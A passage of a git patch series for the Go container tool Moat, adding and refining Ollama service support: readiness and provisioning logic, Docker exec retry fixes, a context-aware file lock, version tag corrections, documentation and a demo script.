explicit `versions` lists. Ollama omits this. Additionally, the `image` value is unquoted (`ollama/ollama`) while others use quoted strings. 
- -## Findings - -- **Source**: Pattern Recognition Specialist -- **Location**: `internal/deps/registry.yaml:492-506` - -## Acceptance Criteria - -- [ ] Add `versions` list to ollama registry entry -- [ ] Quote the `image` value for consistency From b0326927d347a47062af5476abb616906613c54a Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:14:52 +0000 Subject: [PATCH 13/27] fix: address round 2 claude-review feedback on PR #238 - Fix readiness table: Ollama check is just "ollama list", model pulling is a separate provisioning step - Add provisioning step (step 6) to startup sequence docs - Fix security model docs: not all services require passwords (Ollama has no auth, relies on network isolation) - Remove dead todo/005 reference from provisionItem comment --- docs/content/guides/08-services.md | 9 +++++---- internal/run/services.go | 3 +-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index 4cc4b4c7..0012c44e 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -158,8 +158,9 @@ The agent must retry connections until the service is ready. This is useful when 3. Pull service images (if not cached) 4. Start service containers in parallel on the network 5. Run readiness checks (poll every 1 second, timeout after 30 seconds) -6. Inject `MOAT_*` environment variables -7. Start the agent container on the same network +6. Run provisioning commands, if any (e.g., pull Ollama models) +7. Inject `MOAT_*` environment variables +8. 
Start the agent container on the same network ### Shutdown sequence @@ -189,7 +190,7 @@ Each service has a built-in readiness command: | `postgres` | `pg_isready -h localhost -U postgres` | | `mysql` | `mysqladmin ping -h localhost -u root --password=` | | `redis` | `redis-cli -a PING` | -| `ollama` | `ollama list` + pull declared models | +| `ollama` | `ollama list` | Readiness checks run inside the service container via `docker exec`. They verify that the service accepts connections with the generated credentials. @@ -243,7 +244,7 @@ Service dependencies are designed for development and testing. They are not inte - **Ephemeral** — All data is destroyed when the run ends. Nothing persists between runs. - **Isolated** — Service containers are on a private Docker network. No ports are exposed to the host. -- **Authenticated** — Every service requires a password, even on the isolated network. Passwords are 32-character alphanumeric strings generated from `crypto/rand` and unique per run. +- **Authenticated** — Services that support authentication receive a randomly generated password per run. Passwords are 32-character alphanumeric strings from `crypto/rand`. Services without auth (e.g., Ollama) rely on network isolation. - **Scoped** — Credentials exist only in run metadata and are cleared on cleanup. ## Troubleshooting diff --git a/internal/run/services.go b/internal/run/services.go index 145cc1e5..41a88646 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -289,8 +289,7 @@ func provisionService(ctx context.Context, mgr container.ServiceManager, info co // provisionItem runs a single provision command with its own timeout and lock scope. // The lock is shared across parallel moat runs — concurrent runs pulling different -// models will still serialize on this single lock file. See todo/005 for narrowing -// to per-model locks. +// models will still serialize on this single lock file. 
func provisionItem(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cmd string, lockFile *os.File, stdout io.Writer) error { cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) defer cancel() From 1610aed155b5fdd2a63aa90f6ca2e55a42595681 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:21:20 +0000 Subject: [PATCH 14/27] fix: address round 3 claude-review feedback on PR #238 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Error on wait: false with provisioned items (models can't be pulled until service is ready — silent failure before this fix) - Add MOAT_OLLAMA_HOST and MOAT_OLLAMA_PORT to reference docs - Remove head -c truncation from demo.sh (was breaking JSON output) --- docs/content/reference/02-moat-yaml.md | 2 ++ examples/service-ollama/demo.sh | 6 ++---- internal/run/manager.go | 14 ++++++++++++++ 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index ecf91810..7eef34a5 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -930,6 +930,8 @@ Moat injects `MOAT_*` environment variables into the main container for each ser | Variable | Description | Example | |----------|-------------|---------| +| `MOAT_OLLAMA_HOST` | Service hostname | `ollama` | +| `MOAT_OLLAMA_PORT` | Service port | `11434` | | `MOAT_OLLAMA_URL` | Base URL for the Ollama API | `http://ollama:11434` | --- diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 5060475f..f15d2b88 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -6,12 +6,10 @@ echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" echo echo "--- Available models ---" -curl -s "$MOAT_OLLAMA_URL/api/tags" | head -c 200 -echo +curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ 
- -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | head -c 500 + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' echo diff --git a/internal/run/manager.go b/internal/run/manager.go index 5a9df1ae..893c3f81 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1944,6 +1944,20 @@ region = %s } } if !wait { + // Reject wait: false when provisions are declared — models can't + // be pulled until the service is ready. + if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("%s: wait: false is incompatible with provisioning — "+ + "items cannot be pulled until the service is ready\n\n"+ + "Either remove wait: false or remove the provisioned items", + dep.Name) + } continue } From 4d9ee91d85f6256e5b96f78b2e65ca91d6e325fb Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:58:21 +0000 Subject: [PATCH 15/27] fix(services): address low-priority review findings - Context-aware flock: wrap syscall.Flock in a goroutine with select on ctx.Done() so provision lock acquisition respects context cancellation - Provision output to run logs: create RunStore before service provisioning and tee output to both stderr and the run's logs.jsonl via io.MultiWriter - Docker exec inspect race: retry ContainerExecInspect up to 3 times with 100ms backoff when the exec is still marked running after stream EOF - Add test validating wait:false + provisions preconditions --- internal/container/docker_service.go | 45 +++++++++++++++++----- internal/run/manager.go | 57 +++++++++++++++++++--------- internal/run/services.go | 23 ++++++++++- internal/run/services_test.go | 25 ++++++++++++ 4 files changed, 121 insertions(+), 29 deletions(-) diff --git 
a/internal/container/docker_service.go b/internal/container/docker_service.go index 9e3516d9..49032e09 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -5,6 +5,7 @@ import ( "fmt" "io" "sort" + "time" dockercontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" @@ -66,12 +67,24 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) _, _ = io.Copy(io.Discard, resp.Reader) resp.Close() - execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) - if err != nil { - return fmt.Errorf("inspecting readiness check: %w", err) + // Docker may not commit the exit code immediately after the stream closes. + // Retry briefly to avoid a false "running" state from ContainerExecInspect. + var exitCode int + for attempt := 0; attempt < 3; attempt++ { + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting readiness check: %w", err) + } + if !execInspect.Running { + exitCode = execInspect.ExitCode + break + } + if attempt < 2 { + time.Sleep(100 * time.Millisecond) + } } - if execInspect.ExitCode != 0 { - return fmt.Errorf("readiness check failed with exit code %d", execInspect.ExitCode) + if exitCode != 0 { + return fmt.Errorf("readiness check failed with exit code %d", exitCode) } return nil @@ -101,12 +114,24 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) resp.Close() - execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) - if err != nil { - return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + // Docker may not commit the exit code immediately after the stream closes. + // Retry briefly to avoid a false "running" state from ContainerExecInspect. 
+ var exitCode int + for attempt := 0; attempt < 3; attempt++ { + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if !execInspect.Running { + exitCode = execInspect.ExitCode + break + } + if attempt < 2 { + time.Sleep(100 * time.Millisecond) + } } - if execInspect.ExitCode != 0 { - return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + if exitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, exitCode) } } return nil diff --git a/internal/run/manager.go b/internal/run/manager.go index 893c3f81..860bde9a 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1935,6 +1935,21 @@ region = %s r.ServiceContainers[dep.Name] = info.ID } + // Create run storage early so provision output can be captured in logs. + // NewRunStore is idempotent (uses MkdirAll), so it's safe to call now + // even though the main container hasn't been created yet. 
+ store, err := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) + if err != nil { + cleanupServices() + cleanupDaemonRun() + cleanupSSH(sshServer) + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating run storage: %w", err) + } + r.Store = store + // Wait for readiness for i, dep := range serviceDeps { wait := true @@ -1979,7 +1994,12 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) - if err := provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr); err != nil { + provOut := io.Writer(os.Stderr) + if lw, lwErr := store.LogWriter(); lwErr == nil { + provOut = io.MultiWriter(os.Stderr, lw) + defer lw.Close() + } + if err := provisionService(ctx, svcMgr, info, svcConfigs[i], provOut); err != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) @@ -2158,30 +2178,33 @@ region = %s } } - // Create run storage - store, err := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) - if err != nil { - // Clean up container and proxy if storage creation fails - if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { - log.Debug("failed to remove container during cleanup", "error", rmErr) + // Ensure run storage exists (may have been created early for service provisioning, + // or needs to be created now for runs without services). 
+ if r.Store == nil { + runStore, storeErr := storage.NewRunStore(storage.DefaultBaseDir(), r.ID) + if storeErr != nil { + // Clean up container and proxy if storage creation fails + if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { + log.Debug("failed to remove container during cleanup", "error", rmErr) + } + cleanupDaemonRun() + cleanupAgentConfig(claudeConfig) + cleanupAgentConfig(codexConfig) + cleanupAgentConfig(geminiConfig) + return nil, fmt.Errorf("creating run storage: %w", storeErr) } - cleanupDaemonRun() - cleanupAgentConfig(claudeConfig) - cleanupAgentConfig(codexConfig) - cleanupAgentConfig(geminiConfig) - return nil, fmt.Errorf("creating run storage: %w", err) + r.Store = runStore } - r.Store = store // Save the generated Dockerfile to the run directory for debugging/inspection if generatedDockerfile != "" { - if saveErr := store.SaveDockerfile(generatedDockerfile); saveErr != nil { + if saveErr := r.Store.SaveDockerfile(generatedDockerfile); saveErr != nil { log.Debug("failed to save Dockerfile to run directory", "error", saveErr) } } // Open audit store for tamper-proof logging - auditStore, err := audit.OpenStore(filepath.Join(store.Dir(), "audit.db")) + auditStore, err := audit.OpenStore(filepath.Join(r.Store.Dir(), "audit.db")) if err != nil { // Clean up container, proxy, and storage if audit store fails if rmErr := m.runtime.RemoveContainer(ctx, containerID); rmErr != nil { @@ -2213,7 +2236,7 @@ region = %s // Initialize snapshot engine if not disabled if opts.Config != nil && !opts.Config.Snapshots.Disabled { - snapshotDir := filepath.Join(store.Dir(), "snapshots") + snapshotDir := filepath.Join(r.Store.Dir(), "snapshots") snapEngine, snapErr := snapshot.NewEngine(opts.Workspace, snapshotDir, snapshot.EngineOptions{ UseGitignore: !opts.Config.Snapshots.Exclude.IgnoreGitignore, Additional: opts.Config.Snapshots.Exclude.Additional, @@ -2233,7 +2256,7 @@ region = %s // Log resolved secrets (best-effort; non-fatal if it 
fails) for _, secret := range resolvedSecrets { - _ = store.WriteSecretResolution(storage.SecretResolution{ + _ = r.Store.WriteSecretResolution(storage.SecretResolution{ Timestamp: time.Now().UTC(), Name: secret.name, Backend: secret.scheme, diff --git a/internal/run/services.go b/internal/run/services.go index 41a88646..3d95f001 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -296,8 +296,8 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta // Acquire/release lock per-item to avoid holding it across the full batch. if lockFile != nil { - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - return fmt.Errorf("acquiring cache lock: %w", err) + if err := flockContext(cmdCtx, lockFile); err != nil { + return err } defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } @@ -305,6 +305,25 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta return mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) } +// flockContext acquires an exclusive flock, but respects context cancellation. +// syscall.Flock blocks indefinitely; this wraps it in a goroutine so the caller +// can bail out when the context expires. +func flockContext(ctx context.Context, f *os.File) error { + done := make(chan error, 1) + go func() { + done <- syscall.Flock(int(f.Fd()), syscall.LOCK_EX) + }() + select { + case err := <-done: + if err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) + } + return nil + case <-ctx.Done(): + return fmt.Errorf("acquiring cache lock: %w", ctx.Err()) + } +} + // waitForServiceReady polls CheckReady until success or timeout. 
func waitForServiceReady(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo) error { ctx, cancel := context.WithTimeout(ctx, readinessTimeout) diff --git a/internal/run/services_test.go b/internal/run/services_test.go index af01b53c..19e913e9 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -292,6 +292,31 @@ func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { assert.Equal(t, validModels, cfg.Provisions) } +func TestBuildServiceConfigOllamaProvisionsIncompatibleWithWaitFalse(t *testing.T) { + // Validates the fields the manager's wait:false guard checks. + // The guard rejects ProvisionCmd != "" && len(Provisions) > 0 when wait: false. + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-test", userSpec) + require.NoError(t, err) + + // These are the exact conditions the wait:false guard checks + assert.NotEmpty(t, cfg.ProvisionCmd, "ProvisionCmd must be set for guard to trigger") + assert.NotEmpty(t, cfg.Provisions, "Provisions must be set for guard to trigger") + + // Without provisions, the guard should not trigger + cfgNoProv, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + assert.NotEmpty(t, cfgNoProv.ProvisionCmd, "ProvisionCmd is set even without user models") + assert.Empty(t, cfgNoProv.Provisions, "No provisions when user doesn't specify models") +} + func TestBuildProvisionCmds(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) From d1533dd7b23b10453d9b61215815bac4bb314a8e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:23:46 +0000 Subject: [PATCH 16/27] fix(container): return error when Docker exec 
still running after inspect retries MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Both CheckReady and ProvisionService had a bug where if ContainerExecInspect reported the exec as still Running after all 3 retry attempts, the loop would exit without setting the complete flag, exitCode would stay 0, and the function would return nil — a false success. For ProvisionService this meant ollama pull could be silently treated as complete while the pull was still in progress. --- internal/container/docker_service.go | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index 49032e09..c926dd62 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -70,6 +70,7 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) // Docker may not commit the exit code immediately after the stream closes. // Retry briefly to avoid a false "running" state from ContainerExecInspect. var exitCode int + complete := false for attempt := 0; attempt < 3; attempt++ { execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) if err != nil { @@ -77,12 +78,16 @@ func (m *dockerServiceManager) CheckReady(ctx context.Context, info ServiceInfo) } if !execInspect.Running { exitCode = execInspect.ExitCode + complete = true break } if attempt < 2 { time.Sleep(100 * time.Millisecond) } } + if !complete { + return fmt.Errorf("readiness check exec still running after retries") + } if exitCode != 0 { return fmt.Errorf("readiness check failed with exit code %d", exitCode) } @@ -117,6 +122,7 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic // Docker may not commit the exit code immediately after the stream closes. // Retry briefly to avoid a false "running" state from ContainerExecInspect. 
var exitCode int + complete := false for attempt := 0; attempt < 3; attempt++ { execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) if err != nil { @@ -124,12 +130,16 @@ func (m *dockerServiceManager) ProvisionService(ctx context.Context, info Servic } if !execInspect.Running { exitCode = execInspect.ExitCode + complete = true break } if attempt < 2 { time.Sleep(100 * time.Millisecond) } } + if !complete { + return fmt.Errorf("provision command %q exec still running after retries", cmd) + } if exitCode != 0 { return fmt.Errorf("provision command %q failed with exit code %d", cmd, exitCode) } From 3f50f1fcb1ed40fd98d68ed0ec098d9b2f6b56e7 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:26:27 +0000 Subject: [PATCH 17/27] docs(run): clarify flockContext goroutine lifetime after context cancellation --- internal/run/services.go | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/internal/run/services.go b/internal/run/services.go index 3d95f001..b268dc13 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -308,6 +308,11 @@ func provisionItem(ctx context.Context, mgr container.ServiceManager, info conta // flockContext acquires an exclusive flock, but respects context cancellation. // syscall.Flock blocks indefinitely; this wraps it in a goroutine so the caller // can bail out when the context expires. +// +// When context cancellation wins the select, the goroutine remains blocked on +// Flock until either the lock becomes available or the file descriptor is closed. +// The caller's deferred lockFile.Close() handles the latter — so the goroutine +// always terminates promptly. The buffered channel ensures it never blocks on send. 
func flockContext(ctx context.Context, f *os.File) error { done := make(chan error, 1) go func() { From 80ad0c481a3f25c24765c1041e82f463a7e3834b Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:29:08 +0000 Subject: [PATCH 18/27] fix(run): close log writer per provision iteration, not at function exit Using defer lw.Close() inside a loop defers all closes until the outer function returns. Wrap the provision block in an IIFE so defer fires immediately after provisionService returns for each service. Also extract the response field from demo.sh JSON output. --- examples/service-ollama/demo.sh | 3 ++- internal/run/manager.go | 18 ++++++++++++------ 2 files changed, 14 insertions(+), 7 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index f15d2b88..6adca851 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -11,5 +11,6 @@ echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ + | python3 -c "import sys,json; print(json.load(sys.stdin)['response'])" echo diff --git a/internal/run/manager.go b/internal/run/manager.go index 860bde9a..0aa16b1d 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1994,12 +1994,18 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { log.Debug("provisioning service", "service", dep.Name, "items", svcConfigs[i].Provisions) - provOut := io.Writer(os.Stderr) - if lw, lwErr := store.LogWriter(); lwErr == nil { - provOut = io.MultiWriter(os.Stderr, lw) - defer lw.Close() - } - if err := provisionService(ctx, svcMgr, info, svcConfigs[i], provOut); err != nil { + // IIFE so defer lw.Close() fires after provisionService, not at function exit. 
+ // Without this, multiple provision-capable services would accumulate deferred + // closes until the outer function returns. + provErr := func() error { + provOut := io.Writer(os.Stderr) + if lw, lwErr := store.LogWriter(); lwErr == nil { + defer lw.Close() + provOut = io.MultiWriter(os.Stderr, lw) + } + return provisionService(ctx, svcMgr, info, svcConfigs[i], provOut) + }() + if err := provErr; err != nil { cleanupServices() cleanupDaemonRun() cleanupSSH(sshServer) From 60a03dbef3be9c8c0df80392e180d48890558031 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 21:56:36 +0000 Subject: [PATCH 19/27] fix(deps): correct Ollama version tags to match Docker Hub Ollama publishes full semver tags (0.18.1, 0.18.0, ...), not short major.minor tags (0.9). The previous versions 0.6-0.9 do not exist on Docker Hub, causing a 404 on image pull. Update default to 0.18.1 and set versions list to recent releases. Update tests and example moat.yaml accordingly. --- examples/service-ollama/moat.yaml | 2 +- internal/container/apple_service_test.go | 2 +- internal/container/docker_service_test.go | 4 ++-- internal/deps/registry.yaml | 4 ++-- internal/run/services_test.go | 18 +++++++++--------- 5 files changed, 15 insertions(+), 15 deletions(-) diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index dedf37d0..6d3542a9 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -12,7 +12,7 @@ name: service-ollama dependencies: - - ollama@0.9 + - ollama@0.18.1 - curl services: diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 5d91bcb8..2149bbb9 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -118,7 +118,7 @@ func TestGetContainerIPExists(t *testing.T) { func TestAppleBuildRunArgsWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", - Version: "0.9", + Version: "0.18.1", Image: 
"ollama/ollama", Env: map[string]string{}, RunID: "test-run-789", diff --git a/internal/container/docker_service_test.go b/internal/container/docker_service_test.go index b5eb478e..c6ad69c9 100644 --- a/internal/container/docker_service_test.go +++ b/internal/container/docker_service_test.go @@ -46,7 +46,7 @@ func TestBuildSidecarConfigRedis(t *testing.T) { func TestBuildSidecarConfigWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", - Version: "0.9", + Version: "0.18.1", Image: "ollama/ollama", Ports: map[string]int{"default": 11434}, Env: map[string]string{}, @@ -56,7 +56,7 @@ func TestBuildSidecarConfigWithCachePath(t *testing.T) { } sidecarCfg := buildSidecarConfig(cfg, "net-789") - assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "ollama/ollama:0.18.1", sidecarCfg.Image) assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) require.Len(t, sidecarCfg.Mounts, 1) diff --git a/internal/deps/registry.yaml b/internal/deps/registry.yaml index dd508321..58a7f173 100644 --- a/internal/deps/registry.yaml +++ b/internal/deps/registry.yaml @@ -492,8 +492,8 @@ redis: ollama: description: Ollama local model server type: service - default: "0.9" - versions: ["0.6", "0.7", "0.8", "0.9"] + default: "0.18.1" + versions: ["0.16.3", "0.17.7", "0.18.0", "0.18.1"] service: image: "ollama/ollama" ports: diff --git a/internal/run/services_test.go b/internal/run/services_test.go index 19e913e9..d0870e7c 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -145,7 +145,7 @@ func TestBuildServiceConfigUnknown(t *testing.T) { } func TestBuildServiceConfigOllama(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -157,7 +157,7 @@ func TestBuildServiceConfigOllama(t *testing.T) { require.NoError(t, err) assert.Equal(t, 
"ollama", cfg.Name) - assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "0.18.1", cfg.Version) assert.Equal(t, "ollama/ollama", cfg.Image) assert.Equal(t, 11434, cfg.Ports["default"]) assert.Equal(t, "/root/.ollama", cfg.CachePath) @@ -170,7 +170,7 @@ func TestBuildServiceConfigOllama(t *testing.T) { } func TestBuildServiceConfigOllamaNoModels(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} cfg, err := buildServiceConfig(dep, "run-ollama", nil) require.NoError(t, err) @@ -180,7 +180,7 @@ func TestBuildServiceConfigOllamaNoModels(t *testing.T) { } func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} cfg, err := buildServiceConfig(dep, "run-test", nil) require.NoError(t, err) @@ -199,7 +199,7 @@ func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { } func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -213,7 +213,7 @@ func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { } func TestBuildServiceConfigRejectsScalarProvisions(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ @@ -242,7 +242,7 @@ func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { } func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: 
deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} tests := []struct { name string @@ -271,7 +271,7 @@ func TestBuildServiceConfigRejectsShellInjection(t *testing.T) { } func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} validModels := []string{ "qwen2.5-coder:7b", @@ -295,7 +295,7 @@ func TestBuildServiceConfigAcceptsValidModelNames(t *testing.T) { func TestBuildServiceConfigOllamaProvisionsIncompatibleWithWaitFalse(t *testing.T) { // Validates the fields the manager's wait:false guard checks. // The guard rejects ProvisionCmd != "" && len(Provisions) > 0 when wait: false. - dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} userSpec := &config.ServiceSpec{ Extra: map[string][]string{ From 3da983cf1dbacfd0d0f109dde92f342509899523 Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 21:58:58 +0000 Subject: [PATCH 20/27] fix(examples): use jq instead of python3 in Ollama demo python3 is not available in debian:bookworm-slim (the base image when no Python runtime is declared). Use jq -r .response instead, which is available as an apt dependency. 
--- examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 6adca851..fd4c3fe4 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,5 +12,5 @@ echo echo "--- Generating response ---" curl -s "$MOAT_OLLAMA_URL/api/generate" \ -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ - | python3 -c "import sys,json; print(json.load(sys.stdin)['response'])" + | jq -r .response echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index 6d3542a9..8ffde955 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -14,6 +14,7 @@ name: service-ollama dependencies: - ollama@0.18.1 - curl + - jq services: ollama: From a716d17fb770d7b7aec69bbacf3b8aec3697d933 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:05:00 +0000 Subject: [PATCH 21/27] feat(run): print status messages while waiting for services and pulling models --- internal/run/manager.go | 3 +++ 1 file changed, 3 insertions(+) diff --git a/internal/run/manager.go b/internal/run/manager.go index 0aa16b1d..8454d7fb 100644 --- a/internal/run/manager.go +++ b/internal/run/manager.go @@ -1977,6 +1977,7 @@ region = %s } info := serviceInfos[i] + fmt.Fprintf(os.Stderr, "Waiting for %s to be ready...\n", dep.Name) log.Debug("waiting for service to be ready", "service", dep.Name) if err := waitForServiceReady(ctx, svcMgr, info); err != nil { cleanupServices() @@ -1993,6 +1994,8 @@ region = %s // Provision items (e.g., pull models) if configured if svcConfigs[i].ProvisionCmd != "" && len(svcConfigs[i].Provisions) > 0 { + fmt.Fprintf(os.Stderr, "Pulling %d item(s) for %s: %s\n", + len(svcConfigs[i].Provisions), dep.Name, strings.Join(svcConfigs[i].Provisions, ", ")) log.Debug("provisioning service", "service", dep.Name, 
